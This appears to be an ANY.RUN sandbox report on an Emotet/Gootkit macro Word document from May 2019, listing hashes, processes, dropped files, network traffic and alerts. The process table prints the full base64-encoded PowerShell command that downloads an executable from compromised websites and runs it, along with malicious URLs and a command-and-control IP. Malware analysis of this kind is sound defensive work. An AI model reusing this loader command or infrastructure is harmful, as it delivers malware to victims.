analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

dvaDfUEekBoSaXjEBCVHcOWKDdMeW

Full analysis: https://app.any.run/tasks/0a8a5e32-93cd-4d09-9397-7d49061c7a3a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 18:49:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
gootkit
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: leverage Planner back up, Subject: Terrace, Author: Clemmie Cruickshank, Comments: Profound matrix whiteboard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 15 15:15:00 2019, Last Saved Time/Date: Wed May 15 15:15:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0
MD5:

2B3B9F3B7034F488FC96966848F5A183

SHA1:

E67C06660DDCDAF02B2DE8FB63CD870E507F43C5

SHA256:

AC6FA29A2BBAF4C70D7420FBFD5F0F0C206AF78CAFA180DE6064086DA3E0F27D

SSDEEP:

3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qKj9/ICCKI45:a77HUUUUUUUUUUUUUUUUUUUT52V/j9/F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 332.exe (PID: 3544)
      • 332.exe (PID: 2724)
      • soundser.exe (PID: 860)
      • soundser.exe (PID: 2960)
    • GOTKIT detected

      • powershell.exe (PID: 2744)
      • 332.exe (PID: 2724)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2744)
    • Emotet process was detected

      • soundser.exe (PID: 860)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2744)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2744)
      • 332.exe (PID: 2724)
    • Application launched itself

      • 332.exe (PID: 3544)
      • soundser.exe (PID: 860)
    • Starts itself from another location

      • 332.exe (PID: 2724)
    • Connects to server without host name

      • soundser.exe (PID: 2960)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2924)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Stracke
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 202
Paragraphs: 1
Lines: 1
Company: Friesen Group
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 173
Words: 30
Pages: 1
ModifyDate: 2019:05:15 14:15:00
CreateDate: 2019:05:15 14:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Profound matrix whiteboard
Keywords: -
Author: Clemmie Cruickshank
Subject: Terrace
Title: leverage Planner back up
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs #GOOTKIT powershell.exe 332.exe no specs #GOOTKIT 332.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
2924"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dvaDfUEekBoSaXjEBCVHcOWKDdMeW.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2744powershell -enc JABYADAANQA2ADMAMwA9ACcAVwAyADQAOAA2ADIANAAnADsAJABpADUANwAxADMAXwAxACAAPQAgACcAMwAzADIAJwA7ACQAaQBfADYAOAAyADAAOAAwAD0AJwBKADAANwBfADMAOAA5ADAAJwA7ACQAaQA1ADYANQA2ADEANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaQA1ADcAMQAzAF8AMQArACcALgBlAHgAZQAnADsAJABLADMAMAAxADgANQA9ACcARgA0ADQAOAAxADMANQAwACcAOwAkAHEAMgA0AF8AOAA5AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAYABUAC4AdwBFAGAAQgBjAGwASQBlAG4AdAA7ACQAVgAxADkAOAAzADIAPQAnAGgAdAB0AHAAOgAvAC8AcwBoAG8AcABoAGEAbgBxAHUAbwBjAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwAzAGkAdAA3ADQAbgBoADgAMwBfAGoAcwA1AG0ANgAtADcAMQA2AC8AQABoAHQAdABwADoALwAvAHMAYQBuAHYAaQBlAGMAbABhAG0AbgBnAG8AYQBpAG4AdQBvAGMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBRAHIAegB3AFQAcAB5AHcATABNAC8AQABoAHQAdABwAHMAOgAvAC8AaQBuAGgAdQBpAHMAYwByAGUAYQB0AGkAdgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcQBkAGIAYgAwAF8AagBnAGIANQBjAC0AOQA4ADEAMAA2ADkAMgA4ADMALwBAAGgAdAB0AHAAOgAvAC8AZwBtAHIAcwAtAHIAbwBhAG4AbwBrAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEsAcgB0AEgAWQBjAEIAaAAvAEAAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYwBhAG4AbQBlAHIAdABkAG8AZwBhAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHoAcAB1AEYATwBOAGgAZgAvACcALgBzAHAATABJAFQAKAAnAEAAJwApADsAJABqADYAOQA1ADAAOQA0ADcAPQAnAFgAMAA1ADUANQAxACcAOwBmAG8AcgBlAGEAYwBoACgAJABXADIAMQA2ADEAMQA4ADMAIABpAG4AIAAkAFYAMQA5ADgAMwAyACkAewB0AHIAeQB7ACQAcQAyADQAXwA4ADkALgBkAE8AVwBOAGwATwBhAEQAZgBpAGwAZQAoACQAVwAyADEANgAxADEAOAAzACwAIAAkAGkANQA2ADUANgAxADcAKQA7ACQARQA2ADEAOAAwAF8AOQA9ACcAYQA5ADUANgA1ADIAXwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAGkANQA2ADUANgAxADcAKQAuAEwAZQBuAEcAVABoACAALQBnAGUAIAAyADQAMAA1ADUAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAaQA1ADYANQA2ADEANwA7ACQAcgA0ADIAOAAxADAAOAA9ACcAegBfADQAMQA4AF8AJwA7AGIAcgBlAGEAawA7ACQAbgBfADgAMAA3ADAAPQAnAHEAMgA5ADEAOAA1ADIAMQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAF8AOQBfADAAMgA3AD0AJwBZADMAOQA4ADcAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3544"C:\Users\admin\332.exe" C:\Users\admin\332.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2724--f6489cf0C:\Users\admin\332.exe
332.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
860"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
332.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2960--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 697
Read events
1 216
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE8F7.tmp.cvr
MD5:
SHA256:
2744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9VQCTVMQSZPCIXZJJWXL.temp
MD5:
SHA256:
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:944BE23DE8134836FB344483D1013C8B
SHA256:6A34D5538BD55853104FF8CC9B892C4858C3CE1A97696BAF5D916740223B9560
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B329A3D6.wmfwmf
MD5:07E02C87E5A40C39B875297B62576863
SHA256:42BD09FD04F9AB661BCA98DD0F875E78247DB51CB770E8EEFE9C6813B083646D
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3D3E74D.wmfwmf
MD5:C49DD8AADB70C366156296DF12D12112
SHA256:D41A84FF06C1103C002BE2173C68F89CA32C9561F02B035F0172ACA91F193681
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$aDfUEekBoSaXjEBCVHcOWKDdMeW.docpgc
MD5:AC8315EF1A1B33EA3B7ADE463A6C4284
SHA256:EBE23B99E55DBBFC123BFE23E1AD368C7608606296D5A8DAACD0330220DA4B5F
2924WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2445A0A77396BDF54E13CF88D259E053
SHA256:3B6A15B0A7BBC2D301BCC38624170DDCAED04BC8E8166D1E5A9BD836C3D09E38
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4131D7C.wmfwmf
MD5:0DCB247481DB7AD8A2653182879CA13E
SHA256:F2F292BA4709A392817273C13C1CA0A4272944729443DBE4D0CD0B2ECCA4AAE0
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFBC4AE9.wmfwmf
MD5:34F16153E81875FF29235D971AF3AB50
SHA256:725ACD885701F5397F8014FEAA0A3529CFB3B17BFBBD82E00A2E0545918EA156
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26706CEA.wmfwmf
MD5:1746467F81EF3A4FBD17A719C8F5497B
SHA256:EA4B6D31DA97FD6BBAB4EA051D90A97BF7888C39F7D584B5FF97834235ECD276
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2960
soundser.exe
POST
90.57.69.215:80
http://90.57.69.215/window/
FR
malicious
2744
powershell.exe
GET
200
202.92.6.12:80
http://shophanquoc.net/wp-content/73it74nh83_js5m6-716/
VN
executable
121 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2960
soundser.exe
90.57.69.215:80
Orange
FR
malicious
2744
powershell.exe
202.92.6.12:80
shophanquoc.net
VNPT Corp
VN
suspicious

DNS requests

Domain
IP
Reputation
shophanquoc.net
  • 202.92.6.12
suspicious

Threats

PID
Process
Class
Message
2744
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2744
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2744
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info